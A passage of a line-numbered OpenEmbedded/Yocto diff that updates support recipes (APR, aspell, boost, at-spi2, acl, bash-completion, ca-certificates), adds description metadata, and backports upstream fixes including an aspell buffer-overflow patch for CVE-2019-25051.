13@@ -39,11 +39,11 @@ fi 14 1 file changed, 4 insertions(+), 6 deletions(-)
15
16diff --git a/build/buildcheck.sh b/build/buildcheck.sh
17index 44921b5..08bc8a8 100755
18--- a/build/buildcheck.sh
19+++ b/build/buildcheck.sh
20@@ -39,13 +39,11 @@ fi
14 # ltmain.sh (GNU libtool 1.1361 2004/01/02 23:10:52) 1.5a 21 # ltmain.sh (GNU libtool 1.1361 2004/01/02 23:10:52) 1.5a
15 # output is multiline from 1.5 onwards 22 # output is multiline from 1.5 onwards
16 23
17-# Require libtool 1.4 or newer 24-# Require libtool 1.4 or newer
18-libtool=`build/PrintPath glibtool1 glibtool libtool libtool15 libtool14` 25-if test -z "$libtool"; then
26- libtool=`build/PrintPath glibtool1 glibtool libtool libtool15 libtool14`
27-fi
19-lt_pversion=`$libtool --version 2>/dev/null|sed -e 's/([^)]*)//g;s/^[^0-9]*//;s/[- ].*//g;q'` 28-lt_pversion=`$libtool --version 2>/dev/null|sed -e 's/([^)]*)//g;s/^[^0-9]*//;s/[- ].*//g;q'`
20+# Require libtoolize 1.4 or newer 29+# Require libtoolize 1.4 or newer
21+libtoolize=`build/PrintPath glibtoolize1 glibtoolize libtoolize libtoolize15 libtoolize14` 30+libtoolize=`build/PrintPath glibtoolize1 glibtoolize libtoolize libtoolize15 libtoolize14`
diff --git a/meta/recipes-support/apr/apr_1.7.0.bb b/meta/recipes-support/apr/apr_1.7.2.bb
index c9b9bf0f50..807dce21da 100644
--- a/meta/recipes-support/apr/apr_1.7.0.bb
+++ b/meta/recipes-support/apr/apr_1.7.2.bb
@@ -1,8 +1,8 @@
1SUMMARY = "Apache Portable Runtime (APR) library" 1SUMMARY = "Apache Portable Runtime (APR) library"
2DESCRIPTION = "The Apache Portable Runtime (APR) is a supporting library for the \ 2
3Apache web server. It provides a set of APIs that map to the underlying \ 3DESCRIPTION = "Create and maintain software libraries that provide a predictable \
4operating system (OS). Where the OS does not support a particular function, \ 4and consistent interface to underlying platform-specific implementations."
5APR will provide an emulation." 5
6HOMEPAGE = "http://apr.apache.org/" 6HOMEPAGE = "http://apr.apache.org/"
7SECTION = "libs" 7SECTION = "libs"
8DEPENDS = "util-linux" 8DEPENDS = "util-linux"
@@ -16,17 +16,15 @@ BBCLASSEXTEND = "native nativesdk"
16SRC_URI = "${APACHE_MIRROR}/apr/${BPN}-${PV}.tar.bz2 \ 16SRC_URI = "${APACHE_MIRROR}/apr/${BPN}-${PV}.tar.bz2 \
17 file://run-ptest \ 17 file://run-ptest \
18 file://0002-apr-Remove-workdir-path-references-from-installed-ap.patch \ 18 file://0002-apr-Remove-workdir-path-references-from-installed-ap.patch \
19 file://0003-Makefile.in-configure.in-support-cross-compiling.patch \
20 file://0004-Fix-packet-discards-HTTP-redirect.patch \ 19 file://0004-Fix-packet-discards-HTTP-redirect.patch \
21 file://0005-configure.in-fix-LTFLAGS-to-make-it-work-with-ccache.patch \ 20 file://0005-configure.in-fix-LTFLAGS-to-make-it-work-with-ccache.patch \
22 file://0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch \
23 file://0007-explicitly-link-libapr-against-phtread-to-make-gold-.patch \ 21 file://0007-explicitly-link-libapr-against-phtread-to-make-gold-.patch \
24 file://libtoolize_check.patch \ 22 file://libtoolize_check.patch \
25 file://0001-Add-option-to-disable-timed-dependant-tests.patch \ 23 file://0001-Add-option-to-disable-timed-dependant-tests.patch \
24 file://0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch \
26 " 25 "
27 26
28SRC_URI[md5sum] = "7a14a83d664e87599ea25ff4432e48a7" 27SRC_URI[sha256sum] = "75e77cc86776c030c0a5c408dfbd0bf2a0b75eed5351e52d5439fa1e5509a43e"
29SRC_URI[sha256sum] = "e2e148f0b2e99b8e5c6caa09f6d4fb4dd3e83f744aa72a952f94f5a14436f7ea"
30 28
31inherit autotools-brokensep lib_package binconfig multilib_header ptest multilib_script 29inherit autotools-brokensep lib_package binconfig multilib_header ptest multilib_script
32 30
@@ -34,17 +32,30 @@ OE_BINCONFIG_EXTRA_MANGLE = " -e 's:location=source:location=installed:'"
34 32
35# Added to fix some issues with cmake. Refer to https://github.com/bmwcarit/meta-ros/issues/68#issuecomment-19896928 33# Added to fix some issues with cmake. Refer to https://github.com/bmwcarit/meta-ros/issues/68#issuecomment-19896928
36CACHED_CONFIGUREVARS += "apr_cv_mutex_recursive=yes" 34CACHED_CONFIGUREVARS += "apr_cv_mutex_recursive=yes"
37 35# Enable largefile
36CACHED_CONFIGUREVARS += "apr_cv_use_lfs64=yes"
37# Additional AC_TRY_RUN tests which will need to be cached for cross compile
38CACHED_CONFIGUREVARS += "apr_cv_epoll=yes epoll_create1=yes apr_cv_sock_cloexec=yes \
39 ac_cv_struct_rlimit=yes \
40 ac_cv_func_sem_open=yes \
41 apr_cv_process_shared_works=yes \
42 apr_cv_mutex_robust_shared=yes \
43 "
38# Also suppress trying to use sctp. 44# Also suppress trying to use sctp.
39# 45#
40CACHED_CONFIGUREVARS += "ac_cv_header_netinet_sctp_h=no ac_cv_header_netinet_sctp_uio_h=no" 46CACHED_CONFIGUREVARS += "ac_cv_header_netinet_sctp_h=no ac_cv_header_netinet_sctp_uio_h=no"
41 47
42CACHED_CONFIGUREVARS += "ac_cv_sizeof_struct_iovec=yes" 48# ac_cv_sizeof_struct_iovec is deduced using runtime check which will fail during cross-compile
49CACHED_CONFIGUREVARS += "${@['ac_cv_sizeof_struct_iovec=16','ac_cv_sizeof_struct_iovec=8'][d.getVar('SITEINFO_BITS') != '32']}"
50
43CACHED_CONFIGUREVARS += "ac_cv_file__dev_zero=yes" 51CACHED_CONFIGUREVARS += "ac_cv_file__dev_zero=yes"
44 52
53CACHED_CONFIGUREVARS:append:libc-musl = " ac_cv_strerror_r_rc_int=yes"
45PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'ipv6', d)}" 54PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'ipv6', d)}"
55PACKAGECONFIG:append:libc-musl = " xsi-strerror"
46PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6," 56PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6,"
47PACKAGECONFIG[timed-tests] = "--enable-timed-tests,--disable-timed-tests," 57PACKAGECONFIG[timed-tests] = "--enable-timed-tests,--disable-timed-tests,"
58PACKAGECONFIG[xsi-strerror] = "ac_cv_strerror_r_rc_int=yes,ac_cv_strerror_r_rc_int=no,"
48 59
49do_configure_prepend() { 60do_configure_prepend() {
50 # Avoid absolute paths for grep since it causes failures 61 # Avoid absolute paths for grep since it causes failures
diff --git a/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb b/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb
index 21bbcab3d3..d1db562bb5 100644
--- a/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb
+++ b/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb
@@ -2,6 +2,7 @@
2# Released under the MIT license (see COPYING.MIT for the terms) 2# Released under the MIT license (see COPYING.MIT for the terms)
3 3
4SUMMARY = "Glibc hierarchical argument parsing standalone library" 4SUMMARY = "Glibc hierarchical argument parsing standalone library"
5DESCRIPTION = "Standalone version of arguments parsing functions from GLIBC"
5HOMEPAGE = "http://www.lysator.liu.se/~nisse/misc/" 6HOMEPAGE = "http://www.lysator.liu.se/~nisse/misc/"
6LICENSE = "LGPL-2.1" 7LICENSE = "LGPL-2.1"
7LIC_FILES_CHKSUM = "file://argp.h;beginline=1;endline=20;md5=008b7e53dea6f9e1d9fdef0d9cf3184a" 8LIC_FILES_CHKSUM = "file://argp.h;beginline=1;endline=20;md5=008b7e53dea6f9e1d9fdef0d9cf3184a"
diff --git a/meta/recipes-support/aspell/aspell_0.60.8.bb b/meta/recipes-support/aspell/aspell_0.60.8.bb
index f1d931b39c..9147c820e7 100644
--- a/meta/recipes-support/aspell/aspell_0.60.8.bb
+++ b/meta/recipes-support/aspell/aspell_0.60.8.bb
@@ -1,14 +1,21 @@
1SUMMARY = "GNU Aspell spell-checker" 1SUMMARY = "GNU Aspell spell-checker"
2DESCRIPTION = "GNU Aspell is a spell-checker which can be used either as a \ 2
3standalone application or embedded in other programs. Its main feature is that \ 3DESCRIPTION = "Spell checker designed to eventually replace Ispell. \
4it does a much better job of suggesting possible spellings than just about any \ 4It can either be used as a library or as an independent spell checker. \
5other spell-checker available for the English language" 5Its main feature is that it does a superior job of suggesting possible \
6replacements for a misspelled word than just about any other spell \
7checker out there for the English language."
8
6SECTION = "console/utils" 9SECTION = "console/utils"
7 10
11HOMEPAGE = "http://aspell.net/"
12
8LICENSE = "LGPLv2 | LGPLv2.1" 13LICENSE = "LGPLv2 | LGPLv2.1"
9LIC_FILES_CHKSUM = "file://COPYING;md5=7fbc338309ac38fefcd64b04bb903e34" 14LIC_FILES_CHKSUM = "file://COPYING;md5=7fbc338309ac38fefcd64b04bb903e34"
10 15
11SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz" 16SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz \
17 file://CVE-2019-25051.patch \
18"
12SRC_URI[md5sum] = "012fa9209203ae4e5a61c2a668fd10e3" 19SRC_URI[md5sum] = "012fa9209203ae4e5a61c2a668fd10e3"
13SRC_URI[sha256sum] = "f9b77e515334a751b2e60daab5db23499e26c9209f5e7b7443b05235ad0226f2" 20SRC_URI[sha256sum] = "f9b77e515334a751b2e60daab5db23499e26c9209f5e7b7443b05235ad0226f2"
14 21
diff --git a/meta/recipes-support/aspell/files/CVE-2019-25051.patch b/meta/recipes-support/aspell/files/CVE-2019-25051.patch
new file mode 100644
index 0000000000..8513f6de79
--- /dev/null
+++ b/meta/recipes-support/aspell/files/CVE-2019-25051.patch
@@ -0,0 +1,101 @@
1From 0718b375425aad8e54e1150313b862e4c6fd324a Mon Sep 17 00:00:00 2001
2From: Kevin Atkinson <kevina@gnu.org>
3Date: Sat, 21 Dec 2019 20:32:47 +0000
4Subject: [PATCH] objstack: assert that the alloc size will fit within a chunk
5 to prevent a buffer overflow
6
7Bug found using OSS-Fuze.
8
9Upstream-Status: Backport
10[https://github.com/gnuaspell/aspell/commit/0718b375425aad8e54e1150313b862e4c6fd324a]
11CVE: CVE-2019-25051
12Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
13---
14 common/objstack.hpp | 18 ++++++++++++++----
15 1 file changed, 14 insertions(+), 4 deletions(-)
16
17diff --git a/common/objstack.hpp b/common/objstack.hpp
18index 3997bf7..bd97ccd 100644
19--- a/common/objstack.hpp
20+++ b/common/objstack.hpp
21@@ -5,6 +5,7 @@
22 #include "parm_string.hpp"
23 #include <stdlib.h>
24 #include <assert.h>
25+#include <stddef.h>
26
27 namespace acommon {
28
29@@ -26,6 +27,12 @@ class ObjStack
30 byte * temp_end;
31 void setup_chunk();
32 void new_chunk();
33+ bool will_overflow(size_t sz) const {
34+ return offsetof(Node,data) + sz > chunk_size;
35+ }
36+ void check_size(size_t sz) {
37+ assert(!will_overflow(sz));
38+ }
39
40 ObjStack(const ObjStack &);
41 void operator=(const ObjStack &);
42@@ -56,7 +63,7 @@ class ObjStack
43 void * alloc_bottom(size_t size) {
44 byte * tmp = bottom;
45 bottom += size;
46- if (bottom > top) {new_chunk(); tmp = bottom; bottom += size;}
47+ if (bottom > top) {check_size(size); new_chunk(); tmp = bottom; bottom += size;}
48 return tmp;
49 }
50 // This alloc_bottom will insure that the object is aligned based on the
51@@ -66,7 +73,7 @@ class ObjStack
52 align_bottom(align);
53 byte * tmp = bottom;
54 bottom += size;
55- if (bottom > top) {new_chunk(); goto loop;}
56+ if (bottom > top) {check_size(size); new_chunk(); goto loop;}
57 return tmp;
58 }
59 char * dup_bottom(ParmString str) {
60@@ -79,7 +86,7 @@ class ObjStack
61 // always be aligned as such.
62 void * alloc_top(size_t size) {
63 top -= size;
64- if (top < bottom) {new_chunk(); top -= size;}
65+ if (top < bottom) {check_size(size); new_chunk(); top -= size;}
66 return top;
67 }
68 // This alloc_top will insure that the object is aligned based on
69@@ -88,7 +95,7 @@ class ObjStack
70 {loop:
71 top -= size;
72 align_top(align);
73- if (top < bottom) {new_chunk(); goto loop;}
74+ if (top < bottom) {check_size(size); new_chunk(); goto loop;}
75 return top;
76 }
77 char * dup_top(ParmString str) {
78@@ -117,6 +124,7 @@ class ObjStack
79 void * alloc_temp(size_t size) {
80 temp_end = bottom + size;
81 if (temp_end > top) {
82+ check_size(size);
83 new_chunk();
84 temp_end = bottom + size;
85 }
86@@ -131,6 +139,7 @@ class ObjStack
87 } else {
88 size_t s = temp_end - bottom;
89 byte * p = bottom;
90+ check_size(size);
91 new_chunk();
92 memcpy(bottom, p, s);
93 temp_end = bottom + size;
94@@ -150,6 +159,7 @@ class ObjStack
95 } else {
96 size_t s = temp_end - bottom;
97 byte * p = bottom;
98+ check_size(size);
99 new_chunk();
100 memcpy(bottom, p, s);
101 temp_end = bottom + size;
diff --git a/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb b/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb
index c297912588..ad30617e56 100644
--- a/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb
+++ b/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb
@@ -1,5 +1,7 @@
1SUMMARY = "AT-SPI 2 Toolkit Bridge" 1SUMMARY = "AT-SPI 2 Toolkit Bridge"
2DESCRIPTION = "Contains a library that bridges ATK to At-Spi2 D-Bus service. Toolkit widgets use it to provide their content to screen readers such as Orca."
2HOMEPAGE = "https://wiki.linuxfoundation.org/accessibility/d-bus" 3HOMEPAGE = "https://wiki.linuxfoundation.org/accessibility/d-bus"
4BUGTRACKER = "http://bugzilla.gnome.org/"
3LICENSE = "LGPL-2.1+" 5LICENSE = "LGPL-2.1+"
4LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" 6LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
5 7
diff --git a/meta/recipes-support/atk/at-spi2-core_2.34.0.bb b/meta/recipes-support/atk/at-spi2-core_2.34.0.bb
index bcef8ef169..2ad09878b7 100644
--- a/meta/recipes-support/atk/at-spi2-core_2.34.0.bb
+++ b/meta/recipes-support/atk/at-spi2-core_2.34.0.bb
@@ -1,7 +1,9 @@
1SUMMARY = "Assistive Technology Service Provider Interface (dbus core)" 1SUMMARY = "Assistive Technology Service Provider Interface (dbus core)"
2DESCRIPTION = "At-Spi2 is a protocol over DBus, toolkit widgets use it to \ 2
3provide their content to screen readers such as Orca." 3DESCRIPTION = "It provides a Service Provider Interface for the Assistive Technologies available on the GNOME platform and a library against which applications can be linked."
4
4HOMEPAGE = "https://wiki.linuxfoundation.org/accessibility/d-bus" 5HOMEPAGE = "https://wiki.linuxfoundation.org/accessibility/d-bus"
6BUGTRACKER = "http://bugzilla.gnome.org/"
5LICENSE = "LGPL-2.1+" 7LICENSE = "LGPL-2.1+"
6LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" 8LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
7 9
diff --git a/meta/recipes-support/atk/atk_2.34.1.bb b/meta/recipes-support/atk/atk_2.34.1.bb
index 741350ffe5..25ef3c6c52 100644
--- a/meta/recipes-support/atk/atk_2.34.1.bb
+++ b/meta/recipes-support/atk/atk_2.34.1.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Accessibility toolkit for GNOME" 1SUMMARY = "Accessibility toolkit for GNOME"
2DESCRIPTION = "Provides application programming interfaces (APIs) for implementing accessibility support in software."
2HOMEPAGE = "https://wiki.gnome.org/Accessibility" 3HOMEPAGE = "https://wiki.gnome.org/Accessibility"
3BUGTRACKER = "https://gitlab.gnome.org/GNOME/atk/-/issues" 4BUGTRACKER = "https://gitlab.gnome.org/GNOME/atk/-/issues"
4SECTION = "x11/libs" 5SECTION = "x11/libs"
diff --git a/meta/recipes-support/attr/acl_2.2.53.bb b/meta/recipes-support/attr/acl_2.2.53.bb
index b120c1f16f..7cee45948d 100644
--- a/meta/recipes-support/attr/acl_2.2.53.bb
+++ b/meta/recipes-support/attr/acl_2.2.53.bb
@@ -1,7 +1,10 @@
1SUMMARY = "Utilities for managing POSIX Access Control Lists" 1SUMMARY = "Utilities for managing POSIX Access Control Lists"
2HOMEPAGE = "http://savannah.nongnu.org/projects/acl/"
3DESCRIPTION = "ACL allows you to provide different levels of access to files \ 2DESCRIPTION = "ACL allows you to provide different levels of access to files \
4and folders for different users." 3and folders for different users."
4
5HOMEPAGE = "http://savannah.nongnu.org/projects/acl/"
6BUGTRACKER = "http://savannah.nongnu.org/bugs/?group=acl"
7
5SECTION = "libs" 8SECTION = "libs"
6 9
7LICENSE = "LGPLv2.1+ & GPLv2+" 10LICENSE = "LGPLv2.1+ & GPLv2+"
diff --git a/meta/recipes-support/attr/attr.inc b/meta/recipes-support/attr/attr.inc
index 8515f96bf7..30ba0b4445 100644
--- a/meta/recipes-support/attr/attr.inc
+++ b/meta/recipes-support/attr/attr.inc
@@ -1,8 +1,6 @@
1SUMMARY = "Utilities for manipulating filesystem extended attributes" 1SUMMARY = "Utilities for manipulating filesystem extended attributes"
2DESCRIPTION = "A set of tools for manipulating extended attributes on filesystem \ 2DESCRIPTION = "Implement the ability for a user to attach name:value pairs to objects within the XFS filesystem."
3objects, in particular getfattr(1) and setfattr(1). An attr(1) command \ 3
4is also provided which is largely compatible with the SGI IRIX tool of \
5the same name."
6HOMEPAGE = "http://savannah.nongnu.org/projects/attr/" 4HOMEPAGE = "http://savannah.nongnu.org/projects/attr/"
7SECTION = "libs" 5SECTION = "libs"
8 6
diff --git a/meta/recipes-support/bash-completion/bash-completion_2.10.bb b/meta/recipes-support/bash-completion/bash-completion_2.10.bb
index 58e565dee5..1f99bf7386 100644
--- a/meta/recipes-support/bash-completion/bash-completion_2.10.bb
+++ b/meta/recipes-support/bash-completion/bash-completion_2.10.bb
@@ -1,6 +1,9 @@
1SUMMARY = "Programmable Completion for Bash 4" 1SUMMARY = "Programmable Completion for Bash 4"
2DESCRIPTION = "bash completion extends bash's standard completion behavior to \ 2DESCRIPTION = "Collection of command line command completions for the Bash shell, \
3achieve complex command lines with just a few keystrokes." 3collection of helper functions to assist in creating new completions, \
4and set of facilities for loading completions automatically on demand, as well \
5as installing them."
6
4HOMEPAGE = "https://github.com/scop/bash-completion" 7HOMEPAGE = "https://github.com/scop/bash-completion"
5BUGTRACKER = "https://github.com/scop/bash-completion/issues" 8BUGTRACKER = "https://github.com/scop/bash-completion/issues"
6 9
diff --git a/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb b/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb
index 986f0124e2..6a93cacc18 100644
--- a/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb
+++ b/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb
@@ -9,7 +9,7 @@ SECTION = "console/utils"
9LICENSE = "GPLv2" 9LICENSE = "GPLv2"
10LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" 10LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
11 11
12SRC_URI = "git://github.com/intel/${BPN}" 12SRC_URI = "git://github.com/intel/${BPN};branch=main;protocol=https"
13 13
14SRCREV = "db7087b883bf52cbff063ad17a41cc1cbb85104d" 14SRCREV = "db7087b883bf52cbff063ad17a41cc1cbb85104d"
15S = "${WORKDIR}/git" 15S = "${WORKDIR}/git"
diff --git a/meta/recipes-support/boost/boost-1.72.0.inc b/meta/recipes-support/boost/boost-1.72.0.inc
index 55a095bf1c..d152895f09 100644
--- a/meta/recipes-support/boost/boost-1.72.0.inc
+++ b/meta/recipes-support/boost/boost-1.72.0.inc
@@ -11,7 +11,7 @@ BOOST_VER = "${@"_".join(d.getVar("PV").split("."))}"
11BOOST_MAJ = "${@"_".join(d.getVar("PV").split(".")[0:2])}" 11BOOST_MAJ = "${@"_".join(d.getVar("PV").split(".")[0:2])}"
12BOOST_P = "boost_${BOOST_VER}" 12BOOST_P = "boost_${BOOST_VER}"
13 13
14SRC_URI = "https://dl.bintray.com/boostorg/release/${PV}/source/${BOOST_P}.tar.bz2" 14SRC_URI = "https://boostorg.jfrog.io/artifactory/main/release/${PV}/source/${BOOST_P}.tar.bz2"
15SRC_URI[md5sum] = "cb40943d2a2cb8ce08d42bc48b0f84f0" 15SRC_URI[md5sum] = "cb40943d2a2cb8ce08d42bc48b0f84f0"
16SRC_URI[sha256sum] = "59c9b274bc451cf91a9ba1dd2c7fdcaf5d60b1b3aa83f2c9fa143417cc660722" 16SRC_URI[sha256sum] = "59c9b274bc451cf91a9ba1dd2c7fdcaf5d60b1b3aa83f2c9fa143417cc660722"
17 17
diff --git a/meta/recipes-support/boost/boost.inc b/meta/recipes-support/boost/boost.inc
index 8eb9494381..1c13fb3599 100644
--- a/meta/recipes-support/boost/boost.inc
+++ b/meta/recipes-support/boost/boost.inc
@@ -1,4 +1,8 @@
1SUMMARY = "Free peer-reviewed portable C++ source libraries" 1SUMMARY = "Free peer-reviewed portable C++ source libraries"
2DESCRIPTION = "Provides free peer-reviewed portable C++ source libraries. The emphasis is on libraries which work well with the C++ \
3Standard Library. One goal is to establish 'existing practice' and \
4provide reference implementations so that the Boost libraries are suitable for eventual standardization. Some of the libraries have already been proposed for inclusion in the C++ Standards Committee's \
5upcoming C++ Standard Library Technical Report."
2SECTION = "libs" 6SECTION = "libs"
3DEPENDS = "bjam-native zlib bzip2" 7DEPENDS = "bjam-native zlib bzip2"
4 8
@@ -161,7 +165,7 @@ do_configure() {
161 165
162 # D2194:Fixing the failure of "error: duplicate initialization of gcc with the following parameters" during compilation. 166 # D2194:Fixing the failure of "error: duplicate initialization of gcc with the following parameters" during compilation.
163 rm -f ${WORKDIR}/user-config.jam 167 rm -f ${WORKDIR}/user-config.jam
164 echo 'using gcc : 4.3.1 : ${CXX} : <cflags>"${CFLAGS}" <cxxflags>"${CXXFLAGS}" <linkflags>"${LDFLAGS}" ;' >> ${WORKDIR}/user-config.jam 168 echo 'using gcc : : ${CXX} : <cflags>"${CFLAGS}" <cxxflags>"${CXXFLAGS}" <linkflags>"${LDFLAGS}" ;' >> ${WORKDIR}/user-config.jam
165 169
166 # If we want Python then we need to tell Boost *exactly* where to find it 170 # If we want Python then we need to tell Boost *exactly* where to find it
167 if ${@bb.utils.contains('BOOST_LIBS', 'python', 'true', 'false', d)}; then 171 if ${@bb.utils.contains('BOOST_LIBS', 'python', 'true', 'false', d)}; then
diff --git a/meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch b/meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch
new file mode 100644
index 0000000000..46c706931b
--- /dev/null
+++ b/meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch
@@ -0,0 +1,32 @@
1From f9d0e594d43afcb4ab0043117249feb266ba4515 Mon Sep 17 00:00:00 2001
2From: Romain Geissler <romain.geissler@amadeus.com>
3Date: Tue, 10 Aug 2021 14:22:28 +0000
4Subject: [PATCH] Fix -Wsign-compare warning with glibc 2.34 on Linux
5 platforms.
6
7In file included from /data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/thread_only.hpp:17,
8 from /data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/thread.hpp:12,
9 from src/GetTest.cpp:12:
10/data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/pthread/thread_data.hpp: In member function 'void boost::thread_attributes::set_stack_size(std::size_t)':
11/data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/pthread/thread_data.hpp:61:19: error: comparison of integer expressions of different signedness: 'std::size_t' {aka 'long unsigned int'} and 'long int' [-Werror=sign-compare]
12 61 | if (size<PTHREAD_STACK_MIN) size=PTHREAD_STACK_MIN;
13 | ^
14
15Upstream-Status: Backport [1.78.0 https://github.com/boostorg/thread/commit/f9d0e594d43afcb4ab0043117249feb266ba4515]
16---
17 boost/thread/pthread/thread_data.hpp | 2 +-
18 1 file changed, 1 insertion(+), 1 deletion(-)
19
20diff --git a/boost/thread/pthread/thread_data.hpp b/boost/thread/pthread/thread_data.hpp
21index bc9b1367..c43b276d 100644
22--- a/boost/thread/pthread/thread_data.hpp
23+++ b/boost/thread/pthread/thread_data.hpp
24@@ -58,7 +58,7 @@ namespace boost
25 std::size_t page_size = ::sysconf( _SC_PAGESIZE);
26 #endif
27 #ifdef PTHREAD_STACK_MIN
28- if (size<PTHREAD_STACK_MIN) size=PTHREAD_STACK_MIN;
29+ if (size<static_cast<std::size_t>(PTHREAD_STACK_MIN)) size=PTHREAD_STACK_MIN;
30 #endif
31 size = ((size+page_size-1)/page_size)*page_size;
32 int res = pthread_attr_setstacksize(&val_, size);
diff --git a/meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch b/meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch
new file mode 100644
index 0000000000..3784cf9165
--- /dev/null
+++ b/meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch
@@ -0,0 +1,24 @@
1From 74fb0a26099bc51d717f5f154b37231ce7df3e98 Mon Sep 17 00:00:00 2001
2From: Rob Boehne <robb@datalogics.com>
3Date: Wed, 20 Nov 2019 11:25:20 -0600
4Subject: [PATCH] Revert change to elide a warning that caused Solaris builds
5 to fail.
6
7Upstream-Status: Backport [1.73.0 https://github.com/boostorg/thread/commit/74fb0a26099bc51d717f5f154b37231ce7df3e98]
8---
9 boost/thread/pthread/thread_data.hpp | 2 +-
10 1 file changed, 1 insertion(+), 1 deletion(-)
11
12diff --git a/boost/thread/pthread/thread_data.hpp b/boost/thread/pthread/thread_data.hpp
13index aefbeb43..bc9b1367 100644
14--- a/boost/thread/pthread/thread_data.hpp
15+++ b/boost/thread/pthread/thread_data.hpp
16@@ -57,7 +57,7 @@ namespace boost
17 #else
18 std::size_t page_size = ::sysconf( _SC_PAGESIZE);
19 #endif
20-#if PTHREAD_STACK_MIN > 0
21+#ifdef PTHREAD_STACK_MIN
22 if (size<PTHREAD_STACK_MIN) size=PTHREAD_STACK_MIN;
23 #endif
24 size = ((size+page_size-1)/page_size)*page_size;
diff --git a/meta/recipes-support/boost/boost_1.72.0.bb b/meta/recipes-support/boost/boost_1.72.0.bb
index df1cc16937..b3ec11933c 100644
--- a/meta/recipes-support/boost/boost_1.72.0.bb
+++ b/meta/recipes-support/boost/boost_1.72.0.bb
@@ -9,4 +9,6 @@ SRC_URI += " \
9 file://0001-dont-setup-compiler-flags-m32-m64.patch \ 9 file://0001-dont-setup-compiler-flags-m32-m64.patch \
10 file://0001-revert-cease-dependence-on-range.patch \ 10 file://0001-revert-cease-dependence-on-range.patch \
11 file://0001-added-typedef-executor_type.patch \ 11 file://0001-added-typedef-executor_type.patch \
12 file://0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch \
13 file://0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch \
12 " 14 "
diff --git a/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch b/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch
new file mode 100644
index 0000000000..5c4a32f526
--- /dev/null
+++ b/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch
@@ -0,0 +1,80 @@
1From cb43ec15b700b25f3c4fe44043a1a021aaf5b768 Mon Sep 17 00:00:00 2001
2From: Alexander Kanavin <alex@linutronix.de>
3Date: Mon, 18 Oct 2021 12:05:49 +0200
4Subject: [PATCH] Revert "mozilla/certdata2pem.py: print a warning for expired
5 certificates."
6
7This avoids a dependency on python3-cryptography, and only checks
8for expired certs (which is upstream concern, but not ours).
9
10Upstream-Status: Inappropriate [oe-core specific]
11Signed-off-by: Alexander Kanavin <alex@linutronix.de>
12---
13 debian/changelog | 1 -
14 debian/control | 2 +-
15 mozilla/certdata2pem.py | 11 -----------
16 3 files changed, 1 insertion(+), 13 deletions(-)
17
18diff --git a/debian/changelog b/debian/changelog
19index 531e4d0..4006509 100644
20--- a/debian/changelog
21+++ b/debian/changelog
22@@ -37,7 +37,6 @@ ca-certificates (20211004) unstable; urgency=low
23 - "Trustis FPS Root CA"
24 - "Staat der Nederlanden Root CA - G3"
25 * Blacklist expired root certificate "DST Root CA X3" (closes: #995432)
26- * mozilla/certdata2pem.py: print a warning for expired certificates.
27
28 -- Julien Cristau <jcristau@debian.org> Thu, 07 Oct 2021 17:12:47 +0200
29
30diff --git a/debian/control b/debian/control
31index 4434b7a..5c6ba24 100644
32--- a/debian/control
33+++ b/debian/control
34@@ -3,7 +3,7 @@ Section: misc
35 Priority: optional
36 Maintainer: Julien Cristau <jcristau@debian.org>
37 Build-Depends: debhelper-compat (= 13), po-debconf
38-Build-Depends-Indep: python3, openssl, python3-cryptography
39+Build-Depends-Indep: python3, openssl
40 Standards-Version: 4.5.0.2
41 Vcs-Git: https://salsa.debian.org/debian/ca-certificates.git
42 Vcs-Browser: https://salsa.debian.org/debian/ca-certificates
43diff --git a/mozilla/certdata2pem.py b/mozilla/certdata2pem.py
44index ede23d4..7d796f1 100644
45--- a/mozilla/certdata2pem.py
46+++ b/mozilla/certdata2pem.py
47@@ -21,16 +21,12 @@
